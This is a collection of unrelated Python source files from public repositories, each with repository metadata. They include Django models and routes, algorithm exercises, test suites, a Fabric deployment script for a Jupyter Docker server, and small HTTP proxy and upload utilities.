a7e3ffcd2e011f091763370a66aab9bd04d4ffec
|
/trade/urls.py
|
fe530542c751a1c69c2b97f02fb07a1a1b56e89f
|
[] |
no_license
|
jiangyuwei666/Shop
|
0363a5c1c55c796e5ff56f07c663eea4bc08de71
|
78d7d4647f5c101c89fc5188808cddecf16d1ee6
|
refs/heads/master
| 2022-12-27T11:05:57.190555
| 2019-08-18T07:50:37
| 2019-08-18T07:50:37
| 189,996,974
| 0
| 0
| null | 2022-12-16T09:43:17
| 2019-06-03T12:02:22
|
Python
|
UTF-8
|
Python
| false
| false
| 412
|
py
|
from django.conf.urls import url, include
from rest_framework.routers import DefaultRouter
from apps.trade.views import ShoppingCartViewSet, OrderInfoViewSet, OrderGoodsViewSet
router = DefaultRouter()
router.register('shopping_cart', ShoppingCartViewSet)
router.register('order_info', OrderInfoViewSet)
router.register('order_goods', OrderGoodsViewSet)
urlpatterns = [
url(r'', include(router.urls)),
]
|
[
"739843128@qq.com"
] |
739843128@qq.com
|
5f1c7ca9826e83c4e2252cfcfb3335b01d8a46bd
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5636311922769920_0/Python/jonyafek/d-large.py
|
681f1d58b9ba783300076960e61ec020cdc6a53d
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,192
|
py
|
#!/usr/bin/python
def solve(k, c, s):
#print "k: " + str(k)
#print "c: " + str(c)
#print "s: " + str(s)
result = ""
numbers_to_verify = range(1, k + 1)
numbers_to_check = []
while numbers_to_verify:
number = 0
for level in xrange(c):
temp_num = 1
if numbers_to_verify:
temp_num = numbers_to_verify.pop()
#print "temp_num: " + str(temp_num)
#print "level: " + str(level)
if 0 == level:
level_value = temp_num
else:
level_value = (k ** level) * (temp_num - 1)
#print "level value: " + str(level_value)
number += level_value
#print "number: " + str(number)
numbers_to_check.append(number)
#print "appended number: " + str(number)
if len(numbers_to_check) > s:
return "IMPOSSIBLE"
for num in numbers_to_check:
result += str(num) + " "
return result.strip()
import sys
input_lines = open(sys.argv[1], "rt").readlines()
stripped_input_lines = [line.strip() for line in input_lines]
num_tests = int(input_lines[0])
#print num_tests
i=1
for line in stripped_input_lines[1:]:
k = int(line.split()[0])
c = int(line.split()[1])
s = int(line.split()[2])
result = solve(k, c, s)
print "Case #" + str(i) + ": " + str(result)
i += 1
|
[
"alexandra1.back@gmail.com"
] |
alexandra1.back@gmail.com
|
05efe8ebcc108f820c6f960b90f10a1c382616f0
|
b5bde7b0be53cf62e4aa19085e75d61636213abb
|
/celebs/migrations/0001_initial.py
|
0b1719c8467ec6535bfa6428967be5b4cddc7c60
|
[] |
no_license
|
pydatageek/imdb-clone-django-vue
|
3ecaa2dbf97225a202c574c06953b4be80fc240b
|
2c77f49be3e5a40b368110630641f22b686eb7bc
|
refs/heads/master
| 2022-12-07T18:29:22.303516
| 2020-04-03T04:54:07
| 2020-04-03T04:54:07
| 252,633,801
| 1
| 0
| null | 2022-11-22T05:27:31
| 2020-04-03T04:40:03
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,349
|
py
|
# Generated by Django 2.2.10 on 2020-04-03 02:02
import celebs.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Celebrity',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('added_date', models.DateTimeField(auto_now_add=True, verbose_name='Added Date')),
('modified_date', models.DateTimeField(auto_now=True, verbose_name='Added Date')),
('slug', models.SlugField(blank=True, max_length=160, unique=True, verbose_name='Slug')),
('first_name', models.CharField(max_length=75, verbose_name='First Name')),
('last_name', models.CharField(max_length=75, verbose_name='Last Name')),
('nick_name', models.CharField(blank=True, default='', max_length=50, verbose_name='Nick Name')),
('birth_date', models.DateField(blank=True, null=True, verbose_name='Birth Date')),
('birth_place', models.CharField(blank=True, default='', max_length=100, verbose_name='Birth Place')),
('content', models.TextField(blank=True, default='', verbose_name='Biography')),
('source_content', models.URLField(blank=True, default='', verbose_name='Biography Souce')),
('trailer', models.URLField(blank=True, default='', help_text='trailer url (ONLY for youtube videos yet)', verbose_name='Trailer')),
('image', models.ImageField(blank=True, default='celebs/default_celeb.jpg', null=True, upload_to=celebs.models.celeb_directory_path, verbose_name='Image')),
('credit_image', models.CharField(blank=True, default='', max_length=250, verbose_name='Image Credit')),
],
options={
'verbose_name': 'Celebrity',
'verbose_name_plural': 'Celebrities',
'ordering': ('last_name', 'first_name'),
},
),
migrations.CreateModel(
name='CelebrityDuty',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'verbose_name': 'Celebrity Duty',
'verbose_name_plural': 'Celebrity Duties',
},
),
migrations.CreateModel(
name='Duty',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('added_date', models.DateTimeField(auto_now_add=True, verbose_name='Added Date')),
('modified_date', models.DateTimeField(auto_now=True, verbose_name='Added Date')),
('name', models.CharField(max_length=100, unique=True, verbose_name='Name')),
('slug', models.SlugField(blank=True, max_length=110, unique=True, verbose_name='Slug')),
('code', models.CharField(max_length=1, verbose_name='Code')),
],
options={
'verbose_name': 'Duty',
'verbose_name_plural': 'Duties',
'ordering': ('code',),
},
),
]
|
[
"pydatageek@gmail.com"
] |
pydatageek@gmail.com
|
1aaf359a44b493c5f11b48b1be9151ffa1bd2dcd
|
d2b6b9792e5dde0a994e875d23d8a8ace2651fca
|
/tests/test_build_and_lint.py
|
5d623626f0a8f1d543e647aaf380c31c4bccc2cd
|
[
"AFL-3.0",
"CC-BY-2.5",
"AFL-2.1",
"CC-BY-3.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
michauhl/planemo
|
908d9bd95febcce3aa8a2e932260f0bd3151f433
|
fdcc6003c1fa45cbe1d074ad9d0f9a491ba99c06
|
refs/heads/master
| 2020-03-11T20:54:11.424703
| 2018-04-17T19:06:32
| 2018-04-17T19:06:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,573
|
py
|
import os
import yaml
from .test_utils import CliTestCase, skip_if_environ
class BuildAndLintTestCase(CliTestCase):
def test_build_and_lint(self):
with self._isolate():
self._check_exit_code(_init_command())
self._check_lint(exit_code=0)
def test_build_and_lint_with_macros(self):
with self._isolate() as f:
self._check_exit_code(_init_command(macros=True))
self._check_lint(exit_code=0)
macros_file = os.path.join(f, "macros.xml")
assert os.path.exists(macros_file)
def test_lint_fails_if_no_help(self):
with self._isolate():
self._check_exit_code(_init_command(help_text=False))
self._check_lint(exit_code=1)
def test_lint_fails_if_no_test(self):
with self._isolate():
self._check_exit_code(_init_command(test_case=False))
self._check_lint(exit_code=1)
def test_lint_fails_if_no_doi(self):
with self._isolate():
self._check_exit_code(_init_command(doi=False))
self._check_lint(exit_code=1)
@skip_if_environ("PLANEMO_SKIP_CWLTOOL_TESTS")
def test_cwl(self):
with self._isolate() as f:
self._check_exit_code(_cwl_init_command())
self._check_lint(filename="seqtk_seq.cwl", exit_code=0)
with open(os.path.join(f, "seqtk_seq.cwl")) as stream:
process_dict = yaml.load(stream)
assert process_dict["id"] == "seqtk_seq"
assert process_dict["label"] == "Convert to FASTA (seqtk)"
assert process_dict["baseCommand"] == ["seqtk", "seq"]
input0 = process_dict["inputs"][0]
assert input0["inputBinding"]["position"] == 1
assert input0["inputBinding"]["prefix"] == "-a"
assert input0["type"] == "File"
output = process_dict["outputs"][0]
assert output["type"] == "File"
assert output["outputBinding"]["glob"] == "out"
assert process_dict["stdout"] == "out"
with open(os.path.join(f, "seqtk_seq_tests.yml")) as stream:
test_dict = yaml.load(stream)
assert test_dict
@skip_if_environ("PLANEMO_SKIP_CWLTOOL_TESTS")
def test_cwl_fail_on_empty_help(self):
with self._isolate():
self._check_exit_code(_cwl_init_command(help_text=False))
self._check_lint(filename="seqtk_seq.cwl", exit_code=1)
@skip_if_environ("PLANEMO_SKIP_CWLTOOL_TESTS")
def test_cwl_fail_on_no_docker(self):
with self._isolate():
self._check_exit_code(_cwl_init_command(help_text=False))
self._check_lint(filename="seqtk_seq.cwl", exit_code=1)
def _check_lint(self, filename="seqtk_seq.xml", exit_code=0):
lint_cmd = ["lint", "--fail_level", "warn", filename]
try:
self._check_exit_code(lint_cmd, exit_code=exit_code)
except Exception:
with open(filename, "r") as f:
print("Failing file contents are [%s]." % f.read())
raise
def _cwl_init_command(help_text=True, container=True, test_case=True):
command = [
"tool_init", "--force", "--cwl",
"--id", "seqtk_seq",
"--name", "Convert to FASTA (seqtk)",
"--container", "jmchilton/seqtk:v1",
"--name", "Convert to FASTA (seqtk)",
"--example_command", "seqtk seq -a 2.fastq > 2.fasta",
"--example_input", "2.fastq",
"--example_output", "2.fasta"
]
if container:
command.extend(["--container", "jmchilton/seqtk:v1"])
if help_text:
command.extend(["--help_text", "The help text."])
if test_case:
command.append("--test_case")
return command
def _init_command(test_case=True, help_text=True, doi=True, macros=False):
command = [
"tool_init", "--force",
"--id", "seqtk_seq",
"--name", "Convert to FASTA (seqtk)",
"--requirement", "seqtk@1.0-r68",
"--example_command", "seqtk seq -a 2.fastq > 2.fasta",
"--example_input", "2.fastq",
"--example_output", "2.fasta"
]
if test_case:
command.append("--test_case")
if help_text:
command.extend(["--help_text", "The help text."])
if doi:
command.extend(["--doi", "10.1101/014043"])
command.extend(["--cite_url", "https://github.com/ekg/vcflib"])
command.extend(["--cite_url", "http://wiki.hpc.ufl.edu/doc/Seqtk"])
if macros:
command.append("--macros")
return command
|
[
"jmchilton@gmail.com"
] |
jmchilton@gmail.com
|
61eb0d93423d7ff12f16262371ed2cf4fa2a0fa6
|
5736e117e8d0e011107c3ce4943cce44ea242263
|
/DP/Lavenshtein.py
|
8744443adb2b9663278c3aa5e76d760482984ce3
|
[] |
no_license
|
arvakagdi/Dynamic-Programming
|
7119d2005f12b9b441b6e3a582d99a5e4ddffa4d
|
49a199413fa939335308533a8303974e3a82cc5c
|
refs/heads/main
| 2023-01-11T01:36:36.862590
| 2020-11-14T14:10:14
| 2020-11-14T14:10:14
| 312,829,648
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,302
|
py
|
# Time: O(mn) || Spacr: O(nm)
def levenshteinDistance(str1, str2):
# set up a matrix of size of first and second string
edits = [[x for x in range(len(str1)+1)] for y in range(len(str2) + 1)]
for i in range(1,len(str2) + 1):
edits[i][0] = edits[i - 1][0] + 1 # set 1st(0th) column to base values
for i in range(1,len(str2) + 1):
for j in range(1,len(str1) + 1):
if str2[i - 1] == str1[j - 1]:
edits[i][j] = edits[i - 1][j - 1]
else:
edits[i][j] = 1 + min(edits[i-1][j], edits[i][j-1], edits[i-1][j-1])
return edits[-1][-1]
def levenshteinDistance1(str1, str2):
small = str1 if len(str1) < len(str2) else str2
big = str1 if len(str1) >= len(str2) else str2
evenEdits = [x for x in range(len(small) + 1)]
oddEdits = [None for x in range(len(small) + 1)]
for i in range(1, len(big) + 1):
if i % 2 == 1:
curr = oddEdits
prev = evenEdits
else:
curr = evenEdits
prev = oddEdits
curr[0] = i
for j in range(1,len(small) + 1):
if big[i-1] == small[j-1]:
curr[j] = prev[j-1]
else:
curr[j] = 1 + min(prev[j-1], curr[j-1], prev[j])
return evenEdits[-1] if len(big)%2 == 0 else oddEdits[-1]
print(levenshteinDistance1("abc", "yabd"))
|
[
"noreply@github.com"
] |
arvakagdi.noreply@github.com
|
b2936740e8936183c7d49945d098ee718bc25273
|
86c360ece5931b8a48f895e8233a571720a5c273
|
/fabfile.py
|
a589579347eeb70a07bdf0c72850e3ad088f3d88
|
[] |
no_license
|
dschien/bbc_tool_deploy
|
c83501a33fa17754a530a36391637a59569d497c
|
ab136aa7872031b99fcee318bc23390b93639db1
|
refs/heads/master
| 2021-01-10T12:20:28.586805
| 2016-10-19T16:10:06
| 2016-10-19T16:10:06
| 52,797,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| true
| false
| 6,817
|
py
|
import boto3
import ConfigParser
import logging
import boto3
import time
from fabric.api import *
from fabric.contrib.files import exists
CONFIG_FILE = "settings.cfg"
config = ConfigParser.RawConfigParser()
config.read(CONFIG_FILE)
env.forward_agent = True
env.update(config._sections['ec2'])
env.hosts = [config.get('ec2', 'host')]
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# create console handler with a higher log level
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - [%(levelname)s] - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
container_state = {'RUNNING': 1, 'STOPPED': 2, 'NOT_FOUND': 3}
def create_instance():
print('creating instance')
ec2 = boto3.resource('ec2')
instances = ec2.create_instances(
ImageId='ami-e1398992',
MinCount=1,
MaxCount=1,
KeyName='ep-host',
SecurityGroupIds=['sg-e78fbc83'],
InstanceType='m4.large',
Placement={
'AvailabilityZone': 'eu-west-1a',
},
BlockDeviceMappings=[
{
'DeviceName': '/dev/xvda',
'Ebs': {
'SnapshotId': 'snap-7d042fb4',
'VolumeSize': 8,
'DeleteOnTermination': True,
'VolumeType': 'gp2',
},
},
],
IamInstanceProfile={'Name': 'ec2_default_instance_role'},
EbsOptimized=True | False
)
iid = instances[0].id
# give the instance a tag name
ec2.create_tags(
Resources=[iid],
Tags=mktag(env.notebook_server_tag)
)
return instances[0]
from fabric.colors import red, green
def assert_running(instance):
if instance.state['Name'] != "running":
print "Firing up instance"
instance.start()
# Give it 10 minutes to appear online
for i in range(120):
time.sleep(5)
# instance.update()
print instance.state
if instance.state['Name'] == "running":
break
else:
print red("Instance did not enter 'running' state within 120s.")
if instance.state['Name'] == "running":
dns = instance.public_dns_name
print "Instance up and running at %s" % dns
config.set('ec2', 'host', dns)
config.set('ec2', 'instance', instance.id)
# config.write(CONFIG_FILE)
print "updating env.hosts"
env.hosts = [dns, ]
print env.hosts
# Writing our configuration file to 'example.cfg'
with open(CONFIG_FILE, 'wb') as configfile:
config.write(configfile)
return instance
def mktag(val):
return [{'Key': 'Name', 'Value': val}]
def assert_instance():
"""
Return an EC2 Instance
:return:
"""
ec2 = boto3.resource('ec2')
instances = ec2.instances.filter(
Filters=[{'Name': 'tag:Name', 'Values': [env.notebook_server_tag]},
# {'Name': 'instance-state-name', 'Values': ['running']}
])
instance_list = [instance for instance in instances]
if len(instance_list) == 0:
print('not existing, will create')
return create_instance()
else:
return assert_running(instance_list[0])
def initial_deployment_with_assert():
print('checking instance')
instance = assert_instance()
execute(_initial_deployment, hosts=[instance.public_dns_name])
def initial_deployment():
execute(_initial_deployment)
def _initial_deployment():
print env.hosts
with settings(warn_only=True):
result = run('docker info')
if result.failed:
sudo('yum install -y docker')
sudo('sudo service docker start')
sudo('sudo usermod -a -G docker ec2-user')
# sudo('yum install -y git')
if not exists('bbc_tool', verbose=True):
sudo('yum install -y git')
run('git clone git@bitbucket.org:dschien/bbc_tool.git')
else:
update()
build_container()
start_nb_server()
def update():
with cd('bbc_tool'):
run('git pull')
def start_nb_server(with_assert=False):
if with_assert:
print('checking instance')
instance = assert_instance()
execute(_run_container, hosts=[instance.public_dns_name])
else:
execute(_run_container)
def _run_container():
update()
cmd = 'docker run -d -p 8888:8888 --name nb-server -v $(pwd):/home/jovyan/work -e PASSWORD="%s" dschien/nb' % \
env.nb_password
with cd('bbc_tool'):
run(cmd)
def build_container(with_assert=False):
print('checking instance')
if with_assert:
assert_instance()
with cd('bbc_tool/docker'):
run('docker build -t dschien/nb .')
def inspect_container(container_name_or_id=''):
""" e.g. fab --host ep.iodicus.net inspect_container:container_name_or_id=... """
with settings(warn_only=True):
result = run("docker inspect --format '{{ .State.Running }}' " + container_name_or_id)
running = (result == 'true')
if result.failed:
logger.warn('inspect_container failed for container {}'.format(container_name_or_id))
return container_state['NOT_FOUND']
if not running:
logger.info('container {} stopped'.format(container_name_or_id))
return container_state['STOPPED']
logger.info('container {} running'.format(container_name_or_id))
return container_state['RUNNING']
def stop_container(container_name_or_id=''):
with settings(warn_only=True):
result = run("docker stop " + container_name_or_id)
if not result.failed:
logger.info('container {} stopped'.format(container_name_or_id))
def remove_container(container_name_or_id=''):
with settings(warn_only=True):
result = run("docker rm " + container_name_or_id)
if result == container_name_or_id:
logger.info('container {} removed'.format(container_name_or_id))
else:
logger.warn('unexpect command result, check log output')
def docker_logs(container_name_or_id=''):
with settings(warn_only=True):
run('docker logs --tail 50 -f {}'.format(container_name_or_id))
def redeploy_container(container_name_or_id=''):
""" e.g. fab --host ep.iodicus.net inspect_container:container_name_or_id=... """
state = inspect_container(container_name_or_id)
if state == container_state['RUNNING']:
stop_container(container_name_or_id)
remove_container(container_name_or_id)
start_nb_server()
def update_site():
"""
Pull from git and restart docker containers
:return:
"""
update()
for container in ['nb-server']:
redeploy_container(container)
|
[
"dschien@gmail.com"
] |
dschien@gmail.com
|
acd3af53e483f5486883751ff18a9e9a124f4c06
|
038e6e13ad4a81cee5dbbd6ccc322d48330d15d7
|
/AnswerCode/463IslandPerimeter.py
|
b6168c15bf6864a09d4e81b9745085bc8ea3662f
|
[] |
no_license
|
aistoume/Leetcode
|
ad69dae6d9f41a03c883fc2582d0afd6997f83d6
|
d8dc574b611d0e3d42367ccd47a44fd8443b0b27
|
refs/heads/master
| 2021-01-12T14:27:18.245818
| 2018-11-09T00:21:04
| 2018-11-09T00:21:04
| 70,066,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 657
|
py
|
### Youbin 2017/06/21
### 463 Island Perimeter
class Solution(object):
def islandPerimeter(self, grid):
p = 0
newGrid = [[0]*(len(grid[0])+2)]
for l in grid:
row = [0]+ l + [0]
newGrid.append(row)
newGrid.append([0]*(len(grid[0])+2))
for row in range(1,len(newGrid)-1):
for col in range(1, len(newGrid[1])-1):
if newGrid[row][col] == 1:
if newGrid[row-1][col] == 0:
p+=1
if newGrid[row+1][col] == 0:
p+=1
if newGrid[row][col-1] == 0:
p+=1
if newGrid[row][col+1] == 0:
p+=1
return p
s = Solution()
l = [[0,1,0,0],[1,1,1,0],[0,1,0,0],[1,1,0,0]]
r = s.islandPerimeter(l)
print r
|
[
"ais.yb.mo@gmail.com"
] |
ais.yb.mo@gmail.com
|
d69f2d5892bc361a4bb224fe5d218221024326c8
|
3ddc7fb5ac7ac91753a29beced3d2cfb63a2ba8b
|
/src/minij_proxy_asgi_aiohttp.py
|
1c317a05af5abdd396904aa838e8becb2573d4f2
|
[] |
no_license
|
abilian/asgi-sandbox
|
3f978ac9eba139e248af3508b506c87ed6f87fe1
|
49f6c50a94e90045c7c60533f6e564e6b745d8b5
|
refs/heads/main
| 2023-05-31T08:39:57.855151
| 2021-06-29T13:34:33
| 2021-06-29T13:34:33
| 364,506,274
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,003
|
py
|
import asyncio
from typing import Mapping
import aiohttp
import fire
import uvicorn
from aiohttp import ClientSSLError, ClientTimeout, TooManyRedirects
from starlette.requests import Request
from starlette.responses import Response
# Extremely aggressive and hardcoded value
TIMEOUT = 10
DEFAULT_ACCESS_URL = "https://mynij.app.officejs.com"
async def application(scope, receive, send):
if scope["type"] != "http":
return
request = Request(scope, receive)
response = Response()
if request.method != "GET":
response.status = 405
else:
async with aiohttp.ClientSession() as client:
await fetch_content(client, request, response)
await response(scope, receive, send)
async def fetch_content(
client: aiohttp.ClientSession, request: Request, response: Response
) -> None:
url = request.query_params["url"]
proxy_query_header = make_request_headers(request.headers)
try:
proxy_response = await client.get(
url, headers=proxy_query_header, timeout=TIMEOUT
)
except ClientSSLError:
# Invalid SSL Certificate
status = 526
except ConnectionError:
status = 523
except ClientTimeout:
status = 524
except TooManyRedirects:
status = 520
else:
response.body = await proxy_response.content.read()
if proxy_response.status == 500:
response.status = 520
else:
copy_proxy_headers(proxy_response, response)
response.headers["Access-Control-Allow-Origin"] = get_access_url(request.headers)
def make_request_headers(headers: Mapping):
request_headers = {}
HEADERS = [
"Content-Type",
"Accept",
"Accept-Language",
"Range",
"If-Modified-Since",
"If-None-Match",
]
for k in HEADERS:
v = headers.get(k)
if v:
request_headers[k] = str(v)
return request_headers
def get_access_url(headers: Mapping):
return headers.get("Origin", DEFAULT_ACCESS_URL)
def copy_proxy_headers(proxy_response, response) -> None:
HEADERS = [
"Content-Disposition",
"Content-Type",
"Date",
"Last-Modified",
"Vary",
"Cache-Control",
"Etag",
"Accept-Ranges",
"Content-Range",
]
for k, v in proxy_response.headers.items():
k = k.title()
if k in HEADERS:
response.headers[k] = v
def main(host="localhost", port=8000, server="uvicorn"):
if server == "uvicorn":
uvicorn.run(
"minij_proxy_asgi_aiohttp:application",
host=host,
port=port,
log_level="info",
)
elif server == "hypercorn":
from hypercorn.asyncio import serve
from hypercorn.config import Config
config = Config()
config.bind = [f"{host}:{port}"]
asyncio.run(serve(application, config))
if __name__ == "__main__":
fire.Fire(main)
|
[
"sf@fermigier.com"
] |
sf@fermigier.com
|
c239fa23fae2712d15c071e023a056a4116c2caf
|
b4cc610bbd069c2b3e1f50c82303d48de21843a4
|
/ce/c235_test.py
|
896a898bca43a1811bb53b5b1aac0718705bf3b4
|
[] |
no_license
|
AakashKumarNain/pythonesque
|
d47b890ff42fa7baa3f25f9569d8a7310c7aa710
|
3225aaf878c52962becafd60a50243a91f92b264
|
refs/heads/master
| 2020-03-18T00:07:00.624695
| 2018-05-19T09:24:16
| 2018-05-19T09:24:16
| 134,078,646
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
"""
Simple or trump
author: Manny egalli64@gmail.com
info: http://thisthread.blogspot.com/2017/01/codeeval-simple-or-trump.html
https://www.codeeval.com/open_challenges/235/
"""
import unittest
from ce.c235 import solution
class TestCodeEval(unittest.TestCase):
def test_provided_1(self):
self.assertEqual('2H', solution('AD 2H | H'))
def test_provided_2(self):
self.assertEqual('KD KH', solution('KD KH | C'))
def test_provided_3(self):
self.assertEqual('JH', solution('JH 10S | C'))
if __name__ == '__main__':
unittest.main()
|
[
"egalli64@gmail.com"
] |
egalli64@gmail.com
|
8609337d0074cd189a54453539b0385f45cc2b9b
|
ed719ee21d88b1d3fa03fbcc41cb2683930ea665
|
/month05/AI/day05/demo05_traffic.py
|
a52e182e55428309879deb30567c217b8cf38444
|
[] |
no_license
|
KarlLichterVonRandoll/learning_python
|
453305c0af116014e384e4335d53b9775587483d
|
c458e203e7f7bfce9641408ef63d6ba041ed7fef
|
refs/heads/master
| 2022-02-23T03:04:24.580457
| 2019-09-17T03:43:45
| 2019-09-17T03:43:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,663
|
py
|
"""
案例:车流量预测 回归问题
"""
import numpy as np
import sklearn.preprocessing as sp
import sklearn.model_selection as ms
import sklearn.svm as svm
import sklearn.metrics as sm
class DigitEncoder():
# 模拟LabelEncoder自定义的数字编码器
def fit_transform(self, y):
return y.astype('i4')
def transform(self, y):
return y.astype('i4')
def inverse_transform(self, y):
return y.astype('str')
# 加载并整理数据
data = np.loadtxt(
'../ml_data/traffic.txt', delimiter=',',
dtype='U20')
data = data.T
# 整理数据集
x, y, encoders = [], [], []
for row in range(len(data)):
# 确定当前这组特征使用何种编码器
if data[row][0].isdigit():
encoder = DigitEncoder()
else:
encoder = sp.LabelEncoder()
# 整理数据集
if row < len(data) - 1:
x.append(encoder.fit_transform(data[row]))
else:
y = encoder.fit_transform(data[row])
encoders.append(encoder)
x = np.array(x).T
y = np.array(y)
print(x.shape, y.shape, x[0], y[0])
# 划分训练集
train_x, test_x, train_y, test_y = \
ms.train_test_split(
x, y, test_size=0.25, random_state=7)
model = svm.SVR(
kernel='rbf', C=10, epsilon=0.2)
model.fit(train_x, train_y)
pred_test_y = model.predict(test_x)
# r2_score
print(sm.r2_score(test_y, pred_test_y))
print(sm.mean_absolute_error(test_y, pred_test_y))
data = [['Tuesday', '13:35', 'San Francisco', 'no']]
data = np.array(data).T
x = []
for row in range(len(data)):
encoder = encoders[row]
x.append(encoder.transform(data[row]))
x = np.array(x).T
pred_y = model.predict(x)
print(pred_y)
|
[
"286631670@qq.com"
] |
286631670@qq.com
|
4785a18fd7f8139ca9ffe991135f4fb33afce469
|
97f285b6f8016a8d1d2d675fffb771df3c9e37b9
|
/web/simplehttpputserver.py
|
29a977339705467a06f309e41d64dc6f919fd323
|
[] |
no_license
|
oskomorokhov/python
|
ef5408499840465d18852954aee9de460d0e7250
|
8909396c4200bd2fca19d3f216ed5f484fb2192a
|
refs/heads/master
| 2021-05-14T09:27:25.413163
| 2019-12-12T21:00:05
| 2019-12-12T21:00:05
| 116,327,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 446
|
py
|
import SimpleHTTPServer
import BaseHTTPServer
class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_PUT(self):
print self.headers
length = int(self.headers["Content-Length"])
path = self.translate_path(self.path)
with open(path, "wb") as dst:
dst.write(self.rfile.read(length))
if __name__ == '__main__':
SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)
|
[
"oskom85@gmail.com"
] |
oskom85@gmail.com
|
3944f19dacca45a6c4ca733edff9d19acdd24250
|
4a8bfa3407aa98a04ede3162f85467b1b5012fe7
|
/tests/test_api/test_methods/test_edit_message_live_location.py
|
07b61a9d518c71e42d0b70073e468713690f8296
|
[] |
no_license
|
aiogram/tg-codegen
|
07ec80814eec46f464d2490fd27b7b6b27257f1b
|
ba3c2f893591d45dda418dd16e0646e260afdf14
|
refs/heads/master
| 2022-12-09T10:44:10.781570
| 2021-11-07T23:33:25
| 2021-11-07T23:33:25
| 218,523,371
| 24
| 5
| null | 2022-12-08T08:47:43
| 2019-10-30T12:33:21
|
Python
|
UTF-8
|
Python
| false
| false
| 1,141
|
py
|
import pytest
from aiogram.api.methods import EditMessageLiveLocation, Request
from tests.mocked_bot import MockedBot
@pytest.mark.skip
class TestEditMessageLiveLocation:
@pytest.mark.asyncio
async def test_method(self, bot: MockedBot):
prepare_result = bot.add_result_for(EditMessageLiveLocation, ok=True, result=None)
response: Union[Message, bool] = await EditMessageLiveLocation(
latitude=..., longitude=...,
)
request: Request = bot.get_request()
assert request.method == "editMessageLiveLocation"
# assert request.data == {}
assert response == prepare_result.result
@pytest.mark.asyncio
async def test_bot_method(self, bot: MockedBot):
prepare_result = bot.add_result_for(EditMessageLiveLocation, ok=True, result=None)
response: Union[Message, bool] = await bot.edit_message_live_location(
latitude=..., longitude=...,
)
request: Request = bot.get_request()
assert request.method == "editMessageLiveLocation"
# assert request.data == {}
assert response == prepare_result.result
|
[
"jroot.junior@gmail.com"
] |
jroot.junior@gmail.com
|
1ee61b83ccfaad20826b03e78474d2cbc307c42e
|
320bf3ddd6233577d9f2f08f046eaef96f881e4e
|
/Pillow-4.3.0/Tests/test_image_fromqpixmap.py
|
543b74bbf249991a39c73878b670772b46f1f152
|
[
"MIT"
] |
permissive
|
leorzz/simplemooc
|
057ba3e220c20907017edfd8d0fc0422f9a6d99c
|
8b1c5e939d534b1fd729596df4c59fc69708b896
|
refs/heads/master
| 2022-10-22T02:24:46.733062
| 2017-12-17T16:37:04
| 2017-12-17T16:37:04
| 112,488,280
| 0
| 1
|
MIT
| 2022-10-08T17:50:17
| 2017-11-29T14:52:23
|
Python
|
UTF-8
|
Python
| false
| false
| 837
|
py
|
from helper import unittest, PillowTestCase, hopper
from test_imageqt import PillowQtTestCase, PillowQPixmapTestCase
from PIL import ImageQt
class TestFromQPixmap(PillowQPixmapTestCase, PillowTestCase):
def roundtrip(self, expected):
PillowQtTestCase.setUp(self)
result = ImageQt.fromqpixmap(ImageQt.toqpixmap(expected))
# Qt saves all pixmaps as rgb
self.assert_image_equal(result, expected.convert('RGB'))
def test_sanity_1(self):
self.roundtrip(hopper('1'))
def test_sanity_rgb(self):
self.roundtrip(hopper('RGB'))
def test_sanity_rgba(self):
self.roundtrip(hopper('RGBA'))
def test_sanity_l(self):
self.roundtrip(hopper('L'))
def test_sanity_p(self):
self.roundtrip(hopper('P'))
if __name__ == '__main__':
unittest.main()
|
[
"rizzi.leo@gmail.com"
] |
rizzi.leo@gmail.com
|
2355d881f34c0c2f4732ca8e036b6929a66a23ef
|
914aa18d6420b9b920e2a20df238302f891f79f1
|
/arda_db/browser/migrations/0026_auto_20150422_1032.py
|
a135283cb1fba4231de8554d44cf9258057ef8a9
|
[
"MIT"
] |
permissive
|
rwspicer/ARDA
|
2152405c911afacad14dd1478b040f5af9246ba2
|
9bd98786feff4afbd45afdf3f3f1c2549f6356cf
|
refs/heads/master
| 2016-08-05T10:08:13.719344
| 2015-05-01T00:56:27
| 2015-05-01T00:56:27
| 30,052,617
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 885
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('browser', '0025_auto_20150422_0958'),
]
operations = [
migrations.AlterField(
model_name='rlibrary',
name='borrower_name',
field=models.CharField(default=b'', max_length=60, verbose_name=b'name'),
preserve_default=True,
),
migrations.AlterField(
model_name='rlibrary',
name='email',
field=models.CharField(default=b'', max_length=50),
preserve_default=True,
),
migrations.AlterField(
model_name='rlibrary',
name='phone',
field=models.CharField(default=b'', max_length=10),
preserve_default=True,
),
]
|
[
"rwspicer@alaska.edu"
] |
